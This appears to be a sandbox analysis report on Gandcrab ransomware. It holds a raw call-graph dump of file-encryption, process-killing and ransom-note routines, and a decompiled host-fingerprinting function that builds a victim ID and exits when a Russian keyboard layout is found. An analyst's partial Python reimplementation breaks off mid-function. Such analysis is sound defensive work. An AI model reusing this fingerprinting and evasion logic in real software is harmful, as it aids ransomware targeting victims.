2118->2105 2119->2117 2120->2118 2122 fc64fb3 2121->2122 2123 fc64fbd SetHandleInformation 2121->2123 2122->2087 2123->2122 2124 fc64fd3 CreatePipe SetHandleInformation 2123->2124 2124->2122 2125 fc64ffc VirtualAlloc 2124->2125 2126 fc65016 wsprintfW 2125->2126 2127 fc6504b lstrcpyA 2125->2127 2132 fc64c40 2126->2132 2127->2087 2129 fc6502b 2137 fc64de0 2129->2137 2133 fc69010 _memset 2132->2133 2134 fc64c5e CreateProcessW 2133->2134 2135 fc64cb4 CloseHandle CloseHandle 2134->2135 2136 fc64ca9 GetLastError 2134->2136 2135->2129 2136->2129 2142 fc64ded 2137->2142 2138 fc64df6 ReadFile 2139 fc64e65 2138->2139 
2138->2142 2140 fc64e83 VirtualFree 2139->2140 2143 fc64cd0 2139->2143 2140->2087 2142->2138 2142->2139 2146 fc64cfb 2143->2146 2144 fc64d35 lstrcpyA 2144->2140 2145 fc64d93 lstrlenA 2147 fc64da0 lstrcpyA 2145->2147 2146->2144 2146->2145 2148 fc64d8d 2146->2148 2147->2140 2148->2144 2164 fc632b0 lstrlenA 2150->2164 2153 fc634d9 ExitProcess 2154 fc63412 2154->2110 2154->2111 2157 fc63483 lstrlenA GetProcessHeap HeapAlloc 2158 fc63407 2157->2158 2159 fc634a5 lstrcpyA 2157->2159 2158->2154 2158->2157 2168 fc63190 2158->2168 2172 fc63200 2158->2172 2159->2158 2161 fc651c0 GetModuleFileNameW 2160->2161 2162 fc651f9 ExitProcess 2160->2162 2161->2162 2163 fc651d2 wsprintfW ShellExecuteW 2161->2163 2163->2162 2165 fc632cf 2164->2165 2166 fc632f8 2164->2166 2167 fc632d0 lstrlenA 2165->2167 2166->2153 2166->2158 2167->2166 2167->2167 2169 fc631b0 lstrcmpiA lstrcmpiA 2168->2169 2170 fc6319e 2168->2170 2169->2158 2170->2169 2171 fc631f1 2170->2171 2171->2158 2179 fc63210 2172->2179 2173 fc6323d 2173->2158 2174 fc63250 lstrlenA GetProcessHeap HeapAlloc 2176 fc6328d 2174->2176 2175 fc6326d 2177 fc63272 lstrlenA GetProcessHeap HeapAlloc 2175->2177 2178 fc63299 2175->2178 2176->2178 2180 fc63291 lstrcpyA 2176->2180 2177->2176 2178->2158 2179->2173 2179->2174 2179->2175 2180->2178 2182 fc69010 _memset 2181->2182 2183 fc63b77 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2182->2183 2183->1832 2184->1849 2186 fc6569c wsprintfW 2185->2186 2211 fc639f0 GetProcessHeap 2186->2211 2189 fc656ef 2190 fc67330 98 API calls 2189->2190 2191 fc656fa 2190->2191 2192 fc67140 16 API calls 2191->2192 2193 fc65705 lstrlenW 2192->2193 2194 fc66f40 49 API calls 2193->2194 2195 fc6571d lstrlenW 2194->2195 2196 fc69010 _memset 2195->2196 2197 fc65766 lstrlenA 2196->2197 2198 fc65782 2197->2198 2199 fc65797 CryptBinaryToStringA 2198->2199 2200 fc657c2 lstrlenA VirtualAlloc lstrlenA 2199->2200 2201 fc657bc GetLastError 2199->2201 2202 fc657ee lstrlenA 2200->2202 2201->2200 
2204 fc65822 2202->2204 2208 fc65805 lstrlenA 2202->2208 2205 fc654a0 97 API calls 2204->2205 2207 fc6582e VirtualFree 2205->2207 2209 fc67c10 10 API calls 2207->2209 2208->2204 2210 fc6585d VirtualFree 2209->2210 2210->1857 2211->2189 2233 fc62f50 K32EnumDeviceDrivers 2212->2233 2214 fc62d8c 2215 fc62de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2214->2215 2218 fc62f50 7 API calls 2214->2218 2216 fc62e75 ExitThread 2215->2216 2217 fc62e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2215->2217 2220 fc62ec5 ShowWindow UpdateWindow CreateThread 2217->2220 2221 fc62ebe ExitThread 2217->2221 2219 fc62d99 2218->2219 2219->2215 2226 fc62f50 7 API calls 2219->2226 2222 fc62ef4 GetMessageW 2220->2222 2223 fc62eed CloseHandle 2220->2223 2224 fc62f3d ExitThread 2222->2224 2225 fc62f0b 2222->2225 2223->2222 2227 fc62f17 TranslateMessage DispatchMessageW 2225->2227 2228 fc62dce 2226->2228 2227->2224 2229 fc62f2c GetMessageW 2227->2229 2228->2224 2243 fc630a0 2228->2243 2229->2224 2229->2227 2234 fc62f82 VirtualAlloc 2233->2234 2235 fc62f7d 2233->2235 2236 fc62f9f K32EnumDeviceDrivers 2234->2236 2237 fc62f99 2234->2237 2235->2214 2238 fc62ff2 VirtualFree 2236->2238 2239 fc62fae 2236->2239 2237->2214 2238->2214 2239->2238 2240 fc62fc0 K32GetDeviceDriverBaseNameW 2239->2240 2240->2239 2241 fc62fd9 lstrcmpiW 2240->2241 2241->2239 2242 fc63009 VirtualFree 2241->2242 2242->2214 2244 fc62f50 7 API calls 2243->2244 2245 fc63151 2244->2245 2246 fc62f50 7 API calls 2245->2246 2251 fc62ddb 2245->2251 2247 fc63160 2246->2247 2248 fc62f50 7 API calls 2247->2248 2247->2251 2249 fc6316c 2248->2249 2250 fc62f50 7 API calls 2249->2250 2249->2251 2250->2251 2251->2224 2252 fc62ad0 VirtualAlloc 2251->2252 2253 fc62b02 GetModuleFileNameW GetTempPathW 2252->2253 2255 fc62b48 2253->2255 2256 fc62b53 lstrlenW 2255->2256 2257 fc62b4c 2255->2257 2267 fc68150 CryptAcquireContextW 2256->2267 2296 fc62960 lstrlenW 2257->2296 2260 fc62b8e GetEnvironmentVariableW 2262 
fc62bac 2260->2262 2261 fc62c45 ExitThread 2263 fc62bd8 lstrcatW lstrcatW lstrcatW 2262->2263 2266 fc62bb0 2262->2266 2279 fc62890 CreateFileW 2263->2279 2265 fc62c2f wsprintfW 2265->2257 2266->2261 2266->2265 2268 fc6817b VirtualAlloc 2267->2268 2269 fc68269 2267->2269 2271 fc68272 CryptReleaseContext VirtualFree 2268->2271 2272 fc681ab 2268->2272 2269->2260 2271->2260 2272->2271 2273 fc681b3 GetModuleHandleA 2272->2273 2274 fc68207 GetProcAddress 2273->2274 2275 fc681f9 LoadLibraryA 2273->2275 2276 fc6824e 2274->2276 2278 fc68216 2274->2278 2275->2274 2275->2276 2277 fc68250 CryptReleaseContext VirtualFree 2276->2277 2277->2269 2278->2276 2278->2277 2278->2278 2280 fc628b8 GetFileSize 2279->2280 2281 fc628f9 2279->2281 2301 fc63030 2280->2301 2281->2266 2284 fc63030 7 API calls 2285 fc628d5 CreateFileMappingW 2284->2285 2286 fc62902 MapViewOfFile 2285->2286 2287 fc628f2 CloseHandle 2285->2287 2288 fc62916 2286->2288 2289 fc62948 CloseHandle CloseHandle 2286->2289 2287->2281 2290 fc63030 7 API calls 2288->2290 2289->2266 2291 fc6291b 2290->2291 2292 fc6292b 2291->2292 2306 fc682a0 CryptAcquireContextW 2291->2306 2317 fc62830 CreateFileW 2292->2317 2297 fc68150 9 API calls 2296->2297 2298 fc629ad RegCreateKeyExW 2297->2298 2299 fc62ac0 2298->2299 2300 fc62a8e lstrlenW RegSetValueExW RegCloseKey 2298->2300 2299->2261 2300->2261 2302 fc62f50 7 API calls 2301->2302 2303 fc6307f 2302->2303 2304 fc628c8 2303->2304 2305 fc62f50 7 API calls 2303->2305 2304->2284 2305->2304 2307 fc68392 2306->2307 2308 fc682ce VirtualAlloc 2306->2308 2307->2292 2310 fc6839b CryptReleaseContext VirtualFree 2308->2310 2311 fc682f8 2308->2311 2310->2292 2311->2310 2312 fc68301 GetModuleHandleA 2311->2312 2313 fc68347 LoadLibraryA 2312->2313 2314 fc68355 GetProcAddress 2312->2314 2313->2314 2315 fc68379 CryptReleaseContext VirtualFree 2313->2315 2314->2315 2316 fc68364 2314->2316 2315->2307 2316->2315 2318 fc6287f UnmapViewOfFile 2317->2318 2319 fc6285b 2317->2319 2318->2289 2320 fc62873 
2319->2320 2321 fc6285f WriteFile 2319->2321 2322 fc62878 FindCloseChangeNotification 2320->2322 2321->2320 2321->2322 2322->2318 2323 fc65ec0 2324 fc65ee2 2323->2324 2325 fc65f0e GetPEB 2324->2325 2326 fc65f28 2325->2326 2326->2326 2327 fc66de0 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2330 fc66c90 2327->2330 2329 fc66e70 VirtualFree ExitThread 2349 fc66640 VirtualAlloc 2330->2349 2332 fc66ca6 2333 fc66dd4 2332->2333 2361 fc66a40 lstrlenW lstrcatW FindFirstFileW 2332->2361 2333->2329 2335 fc66cb5 2335->2333 2376 fc66be0 VirtualAlloc wsprintfW CreateFileW 2335->2376 2337 fc66cc2 lstrlenW lstrcatW FindFirstFileW 2338 fc66d04 2337->2338 2339 fc66cf8 2337->2339 2340 fc66d10 lstrcmpW 2338->2340 2339->2329 2341 fc66db3 FindNextFileW 2340->2341 2342 fc66d2a lstrcmpW 2340->2342 2341->2340 2343 fc66dcb FindClose 2341->2343 2342->2341 2344 fc66d40 lstrcatW 2342->2344 2343->2333 2345 fc66d53 lstrcatW 2344->2345 2348 fc66d6c 2344->2348 2346 fc66c90 102 API calls 2345->2346 2346->2348 2348->2341 2382 fc66950 VirtualAlloc wsprintfW 2348->2382 2351 fc66667 2349->2351 2350 fc6676c VirtualFree 2350->2332 2351->2350 2352 fc666e7 SHGetSpecialFolderPathW 2351->2352 2353 fc66705 SHGetSpecialFolderPathW 2352->2353 2358 fc666f8 2352->2358 2354 fc66712 2353->2354 2355 fc6671f SHGetSpecialFolderPathW 2353->2355 2354->2350 2354->2355 2356 fc6672c 2355->2356 2357 fc66739 SHGetSpecialFolderPathW 2355->2357 2356->2350 2356->2357 2359 fc66746 2357->2359 2360 fc66753 VirtualFree 2357->2360 2358->2350 2358->2353 2359->2350 2359->2360 2360->2332 2362 fc66a90 lstrcmpW 2361->2362 2363 fc66aa6 lstrcmpW 2362->2363 2364 fc66bb2 FindNextFileW 2362->2364 2363->2364 2366 fc66abc lstrcatW lstrlenW 2363->2366 2364->2362 2365 fc66bca FindClose 2364->2365 2365->2335 2367 fc66adf 2366->2367 2367->2364 2368 fc66af4 lstrcmpW 2367->2368 2370 fc66b92 CloseHandle 2367->2370 2373 fc66b81 VirtualFree 2367->2373 2374 fc66b69 lstrlenA 2367->2374 2368->2367 2369 fc66b04 CreateFileW GetFileSize 
2368->2369 2369->2370 2371 fc66b31 VirtualAlloc 2369->2371 2370->2365 2370->2367 2371->2367 2372 fc66b46 ReadFile 2371->2372 2372->2367 2372->2373 2373->2367 2390 fc669e0 lstrlenA 2374->2390 2377 fc66c3e 2376->2377 2378 fc66c2c GetLastError 2376->2378 2380 fc66c47 lstrlenW WriteFile 2377->2380 2381 fc66c64 CloseHandle 2377->2381 2379 fc66c70 VirtualFree 2378->2379 2379->2337 2380->2381 2381->2379 2392 fc66850 2382->2392 2384 fc6698a 2389 fc669a7 VirtualFree 2384->2389 2400 fc66790 lstrlenW lstrlenW 2384->2400 2387 fc669a3 2387->2389 2412 fc635e0 GetFileAttributesW SetFileAttributesW 2387->2412 2389->2348 2391 fc669fa 2390->2391 2391->2367 2393 fc66860 2392->2393 2394 fc6686a lstrlenW 2392->2394 2393->2384 2395 fc66890 2394->2395 2396 fc6687e 2394->2396 2395->2384 2396->2395 2397 fc6689b lstrlenW VirtualAlloc wsprintfW 2396->2397 2399 fc668d8 VirtualFree 2397->2399 2399->2384 2401 fc667be lstrcmpiW 2400->2401 2402 fc667ac 2400->2402 2403 fc667d3 2401->2403 2404 fc667dc lstrcmpiW 2401->2404 2402->2401 2403->2387 2404->2403 2405 fc667e8 lstrcmpiW 2404->2405 2405->2403 2406 fc667f4 lstrcmpiW 2405->2406 2406->2403 2407 fc66800 lstrcmpiW 2406->2407 2407->2403 2408 fc6680c lstrcmpiW 2407->2408 2408->2403 2409 fc66818 lstrcmpiW 2408->2409 2409->2403 2410 fc66824 lstrcmpiW 2409->2410 2410->2403 2411 fc66830 lstrcmpiW 2410->2411 2411->2387 2442 fc663d0 2412->2442 2415 fc682a0 9 API calls 2416 fc636a5 2415->2416 2417 fc682a0 9 API calls 2416->2417 2418 fc636b5 VirtualAlloc VirtualAlloc 2417->2418 2444 fc66530 EnterCriticalSection CryptAcquireContextW 2418->2444 2421 fc63757 2424 fc66530 10 API calls 2421->2424 2422 fc6372b MessageBoxA 2423 fc639d8 VirtualFree 2422->2423 2423->2389 2425 fc6376c 2424->2425 2426 fc63773 GetLastError 2425->2426 2427 fc63792 2425->2427 2426->2423 2428 fc637a5 CreateFileW 2427->2428 2429 fc637fc VirtualAlloc VirtualAlloc 2428->2429 2430 fc637cd VirtualFree VirtualFree 2428->2430 2431 fc63835 ReadFile 2429->2431 2430->2423 2432 fc63940 VirtualFree 
2431->2432 2441 fc63832 _memmove 2431->2441 2433 fc63992 CloseHandle VirtualFree VirtualFree VirtualFree 2432->2433 2434 fc63958 WriteFile WriteFile WriteFile 2432->2434 2435 fc639d5 2433->2435 2436 fc639c9 MoveFileW 2433->2436 2434->2433 2435->2423 2436->2435 2437 fc63888 VirtualAlloc 2437->2441 2438 fc638a7 VirtualAlloc 2439 fc638e5 VirtualFree SetFilePointer WriteFile 2438->2439 2438->2441 2440 fc63927 VirtualFree 2439->2440 2439->2441 2440->2432 2440->2441 2441->2431 2441->2432 2441->2437 2441->2438 2441->2439 2441->2440 2443 fc63626 VirtualAlloc lstrcpyW lstrcatW 2442->2443 2443->2415 2445 fc6659e CryptImportKey 2444->2445 2446 fc66568 GetLastError 2444->2446 2448 fc66622 CryptReleaseContext LeaveCriticalSection 2445->2448 2449 fc665c3 CryptGetKeyParam CryptEncrypt GetLastError 2445->2449 2447 fc66575 CryptAcquireContextW 2446->2447 2451 fc63724 2446->2451 2450 fc66595 2447->2450 2447->2451 2448->2451 2449->2448 2452 fc6661a 2449->2452 2450->2445 2451->2421 2451->2422 2452->2448 2453 fc690a0 IsProcessorFeaturePresent 2454 fc690c6 2453->2454 2488 fc62c50 2489 fc62cda CreateThread DestroyWindow 2488->2489 2490 fc62c7b 2488->2490 2491 fc62c97 BeginPaint lstrlenW TextOutW EndPaint 2490->2491 2492 fc62c80 DefWindowProcW 2490->2492 2493 fc62d10 SendMessageW ExitThread 2455 fc648a8 2456 fc648b0 lstrcmpiW 2455->2456 2457 fc648bf OpenProcess 2456->2457 2458 fc648a4 2456->2458 2457->2458 2459 fc648d1 TerminateProcess CloseHandle 2457->2459 2458->2456 2460 fc648f4 Process32NextW 2458->2460 2459->2458 2460->2458 2461 fc64907 2460->2461 2462 fc6490b VirtualFree 2461->2462 2463 fc64919 FindCloseChangeNotification 2461->2463 2462->2463 2464 fc66d09 2465 fc66d10 lstrcmpW 2464->2465 2466 fc66db3 FindNextFileW 2465->2466 2467 fc66d2a lstrcmpW 2465->2467 2466->2465 2468 fc66dcb FindClose 2466->2468 2467->2466 2469 fc66d40 lstrcatW 2467->2469 2470 fc66dd4 2468->2470 2471 fc66d53 lstrcatW 2469->2471 2472 fc66d6c 2469->2472 2473 fc66c90 111 API calls 2471->2473 2472->2466 2474 
fc66950 69 API calls 2472->2474 2473->2472 2474->2472

Callgraph

[Interactive call graph rendered in the original report; the raw node/edge dump is not reproduced here.]

Control-flow Graph (function fc67330)

[Interactive control-flow graph rendered in the original report; the raw basic-block dump is not reproduced here.]
                                        C-Code - Quality: 88%
                                        			E0FC67330(DWORD* __ecx, void* __edx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				int _v24;
                                        				int _v28;
                                        				intOrPtr _v32;
                                        				short _v36;
                                        				short _v40;
                                        				WCHAR* _v44;
                                        				WCHAR* _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				WCHAR* _v60;
                                        				WCHAR* _v64;
                                        				WCHAR* _v68;
                                        				signed short _v76;
                                        				char _v132;
                                        				void* _t154;
                                        				long _t155;
                                        				WCHAR* _t157;
                                        				short _t158;
                                        				short _t159;
                                        				short _t160;
                                        				signed int _t161;
                                        				signed int _t164;
                                        				signed int _t166;
                                        				int _t178;
                                        				void* _t181;
                                        				signed int _t183;
                                        				signed int _t186;
                                        				WCHAR* _t190;
                                        				void* _t191;
                                        				void* _t199;
                                        				_Unknown_base(*)()* _t204;
                                        				signed int _t211;
                                        				intOrPtr _t216;
                                        				WCHAR* _t218;
                                        				WCHAR* _t220;
                                        				void* _t221;
                                        				void* _t224;
                                        				WCHAR* _t226;
                                        				long _t229;
                                        				int _t230;
                                        				long _t234;
                                        				void* _t238;
                                        				long _t240;
                                        				long _t243;
                                        				WCHAR* _t246;
                                        				void* _t247;
                                        				WCHAR* _t249;
                                        				WCHAR* _t250;
                                        				WCHAR* _t252;
                                        				void* _t256;
                                        				DWORD* _t260;
                                        				short* _t261;
                                        				DWORD* _t266;
                                        				void* _t267;
                                        				signed int _t270;
                                        				void* _t274;
                                        				void* _t276;
                                        				void* _t277;
                                        				DWORD* _t279;
                                        				void* _t280;
                                        				void* _t281;
                                        
                                        				_t267 = __edx;
                                        				_t260 = __ecx;
                                        				_t279 = __ecx;
                                        				if( *__ecx != 0) {
                                        					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 8) = _t252;
                                        					_v24 = 0x100;
                                        					GetUserNameW(_t252, _t260); // executed
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
                                        					_v24 = 0x1e;
                                        					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
                                        					_t260 =  &_v24;
                                        					 *(_t279 + 0x14) = _t250;
                                        					GetComputerNameW(_t250, _t260);
                                        				}
                                        				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
                                        					L11:
                                        					if( *(_t279 + 0x30) == 0) {
                                        						L18:
                                        						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
                                        							L31:
                                        							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
                                        								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
                                        								_push(_t260);
                                        								 *(_t279 + 0x50) = _t220;
                                        								_t221 = E0FC672B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
                                        								if(_t221 == 0) {
                                        									_push(_t260);
                                        									E0FC672B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
                                        									wsprintfW( *(_t279 + 0x50), L"error");
                                        									_t281 = _t281 + 8;
                                        								}
                                        							}
                                        							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
                                        								L44:
                                        								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
                                        									_v28 = 0;
                                        									_t216 = E0FC67A10(_t279 + 0x2c,  &_v28); // executed
                                        									if(_t216 == 0) {
                                        										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
                                        									}
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
                                        									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                        									 *(_t279 + 0x68) = _t190;
                                        									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                        									_t276 = _t191;
                                        									GetWindowsDirectoryW(_t276, 0x100);
                                        									_t66 = _t276 + 0x600; // 0x600
                                        									_t266 = _t66;
                                        									 *((short*)(_t276 + 6)) = 0;
                                        									_t68 = _t276 + 0x400; // 0x400
                                        									_t69 = _t276 + 0x604; // 0x604
                                        									_t70 = _t276 + 0x608; // 0x608
                                        									_t71 = _t276 + 0x200; // 0x200
                                        									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
                                        									_push(_t266);
                                        									_t72 = _t276 + 0x60c; // 0x60c
                                        									_t260 = _t72;
                                        									_t199 = E0FC672B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
                                        									if(_t199 != 0) {
                                        										_t73 = _t276 + 0x60c; // 0x60c
                                        										_t211 = lstrlenW(_t73);
                                        										_t74 = _t276 + 0x60c; // 0x60c
                                        										_t260 = _t74;
                                        										_push(_t260);
                                        										E0FC672B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
                                        									}
                                        									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
                                        									_t79 = _t276 + 0x60c; // 0x60c
                                        									_t281 = _t281 + 0xc;
                                        									lstrcatW( *(_t279 + 0x68), _t79);
                                        									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                        									_v28 = _t204;
                                        									if(_t204 == 0) {
                                        										 *(_t279 + 0x6c) = 0;
                                        									} else {
                                        										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                        									}
                                        									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                        									VirtualFree(_t276, 0, 0x8000); // executed
                                        								}
                                        								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                        									L67:
                                        									if( *(_t279 + 0x80) == 0) {
                                        										L72:
                                        										return 1;
                                        									}
                                        									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                        									 *(_t279 + 0x84) = _t154;
                                        									if(_t154 == 0) {
                                        										L71:
                                        										 *(_t279 + 0x80) = 0;
                                        										goto L72;
                                        									}
                                        									_push(_t260);
                                        									_t155 = E0FC66E90(_t154); // executed
                                        									if(_t155 != 0) {
                                        										goto L72;
                                        									}
                                        									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
                                        									goto L71;
                                        								} else {
                                        									_v68 = L"UNKNOWN";
                                        									_v64 = L"NO_ROOT_DIR";
                                        									_v60 = L"REMOVABLE";
                                        									_v56 = L"FIXED";
                                        									_v52 = L"REMOTE";
                                        									_v48 = L"CDROM";
                                        									_v44 = L"RAMDISK";
                                        									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                        									 *(_t279 + 0x7c) = _t157;
                                        									_t261 =  &_v132;
                                        									_t158 = 0x41;
                                        									do {
                                        										 *_t261 = _t158;
                                        										_t261 = _t261 + 2;
                                        										_t158 = _t158 + 1;
                                        									} while (_t158 <= 0x5a);
                                        									_t159 =  *L"?:\\"; // 0x3a003f
                                        									_v40 = _t159;
                                        									_t160 =  *0xfc6f348; // 0x5c
                                        									_v36 = _t160;
                                        									_t161 = 0;
                                        									_v24 = 0;
                                        									do {
                                        										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                        										_t164 = GetDriveTypeW( &_v40); // executed
                                        										_t270 = _t164;
                                        										if(_t270 > 2 && _t270 != 5) {
                                        											_v36 = 0;
                                        											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                        											_v36 = 0x5c;
                                        											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                        											lstrcatW( *(_t279 + 0x7c), "_");
                                        											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
                                        											if(_t178 == 0) {
                                        												lstrcatW( *(_t279 + 0x7c), L"0,");
                                        												goto L64;
                                        											}
                                        											_v8 = E0FC68950(_v16, 0, _v28 * _v20, 0);
                                        											_t256 = _t267;
                                        											_t181 = E0FC68950(_v12, 0, _v28 * _v20, 0);
                                        											_t274 = _v8;
                                        											_v32 = _t274 - _t181;
                                        											asm("sbb eax, edx");
                                        											_v8 = _t256;
                                        											_t183 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_t256);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                        											_t186 = lstrlenW( *(_t279 + 0x7c));
                                        											_push(_v8);
                                        											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                        											_t281 = _t281 + 0x20;
                                        											lstrcatW( *(_t279 + 0x7c), ",");
                                        										}
                                        										_t161 = _v24 + 1;
                                        										_v24 = _t161;
                                        									} while (_t161 < 0x1b);
                                        									_t166 = lstrlenW( *(_t279 + 0x7c));
                                        									_t260 =  *(_t279 + 0x7c);
                                        									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                        									goto L67;
                                        								}
                                        							} else {
                                        								__imp__GetNativeSystemInfo( &_v76); // executed
                                        								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
                                        								_t260 = _v76 & 0x0000ffff;
                                        								 *(_t279 + 0x5c) = _t218;
                                        								if(_t260 > 9) {
                                        									L42:
                                        									_push(L"Unknown");
                                        									L43:
                                        									wsprintfW(_t218, ??);
                                        									_t281 = _t281 + 8;
                                        									goto L44;
                                        								}
                                        								_t260 =  *(_t260 + E0FC67A00) & 0x000000ff;
                                        								switch( *((intOrPtr*)(_t260 * 4 +  &M0FC679EC))) {
                                        									case 0:
                                        										_push(L"x86");
                                        										goto L43;
                                        									case 1:
                                        										_push(L"ARM");
                                        										goto L43;
                                        									case 2:
                                        										_push(L"Itanium");
                                        										goto L43;
                                        									case 3:
                                        										_push(L"x64");
                                        										goto L43;
                                        									case 4:
                                        										goto L42;
                                        								}
                                        							}
                                        						}
                                        						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
                                        						_v8 = _t224;
                                        						_v20 = _t224 + 0xe;
                                        						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                        						 *(_t279 + 0x44) = _t226;
                                        						_t277 = 1;
                                        						_v24 = 1;
                                        						do {
                                        							wsprintfW(_v8, L"%d", _t277);
                                        							_t281 = _t281 + 0xc;
                                        							_v16 = 0;
                                        							_t277 = _t277 + 1;
                                        							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
                                        							if(_t229 != 0) {
                                        								L27:
                                        								_t230 = 0;
                                        								_v24 = 0;
                                        								goto L28;
                                        							}
                                        							_v28 = 0x80;
                                        							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
                                        							if(_t234 != 0) {
                                        								GetLastError();
                                        							} else {
                                        								_v16 = 1;
                                        							}
                                        							RegCloseKey(_v12); // executed
                                        							if(_v16 == 0) {
                                        								goto L27;
                                        							} else {
                                        								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                        									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                        									_t281 = _t281 + 8;
                                        									ExitProcess(0);
                                        								}
                                        								_t230 = _v24;
                                        							}
                                        							L28:
                                        						} while (_t277 != 9 && _t230 != 0);
                                        						wsprintfW( *(_t279 + 0x44), "0");
                                        						_t281 = _t281 + 8;
                                        						VirtualFree(_v8, 0, 0x8000); // executed
                                        						goto L31;
                                        					}
                                        					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                        					_v20 = _t238;
                                        					 *(_t279 + 0x38) = _t238;
                                        					_v12 = 0;
                                        					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
                                        					if(_t240 != 0) {
                                        						L17:
                                        						 *(_t279 + 0x30) = 0;
                                        						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                        						goto L18;
                                        					}
                                        					_v24 = 0x40;
                                        					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
                                        					if(_t243 != 0) {
                                        						GetLastError();
                                        					} else {
                                        						_v12 = 1;
                                        					}
                                        					RegCloseKey(_v8); // executed
                                        					if(_v12 != 0) {
                                        						goto L18;
                                        					} else {
                                        						goto L17;
                                        					}
                                        				} else {
                                        					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                        					 *(_t279 + 0x20) = _t246;
                                        					if(_t246 == 0) {
                                        						goto L11;
                                        					}
                                        					_push(_t260);
                                        					_t247 = E0FC672B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                        					if(_t247 == 0) {
                                        						wsprintfW( *(_t279 + 0x20), L"undefined");
                                        						L10:
                                        						_t281 = _t281 + 8;
                                        						goto L11;
                                        					}
                                        					_t249 =  *(_t279 + 0x20);
                                        					if( *_t249 != 0) {
                                        						goto L11;
                                        					}
                                        					wsprintfW(_t249, L"WORKGROUP");
                                        					goto L10;
                                        				}
                                        			}
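Analyst note on the routine above: E0FC67330 is the host-fingerprint collector. It reads the user and computer name, the Tcpip Domain value (falling back to "WORKGROUP"/"undefined"), the locale, the Windows product name, the CPU strings, the volume serial, and every drive that GetDriveTypeW reports as FIXED, REMOTE or RAMDISK, and it derives a 32-bit victim ID by passing the serial plus CPU strings to RtlComputeCrc32 with the seed 0x29a. Before any of that is used it walks HKCU\Keyboard Layout\Preload values "1".."8" and calls ExitProcess if one equals "00000419" (Russian). The block below is an added reimplementation of those string-building and ID steps written for this note, not code from the sample or from Joe Sandbox, fed with constructed inputs so the victim ID and drive list can be reproduced offline. Assumptions: RtlComputeCrc32 behaves like zlib.crc32 with the partial value as seed, and the length passed to it (truncated to `lstrlenW(...) + _t207` in the listing) is the UTF-16LE byte length of the buffer.

```python
"""Added example: rebuilds the strings the Gandcrab routine E0FC67330 composes.
Not the sample's code; inputs are constructed, not taken from the sandbox run."""
import zlib

# GetDriveTypeW return values, in the order of the sample's name table.
DRIVE_TYPE_NAMES = ["UNKNOWN", "NO_ROOT_DIR", "REMOVABLE", "FIXED",
                    "REMOTE", "CDROM", "RAMDISK"]

# First argument the sample passes to RtlComputeCrc32.
CRC_SEED = 0x29A


def build_drive_string(drives):
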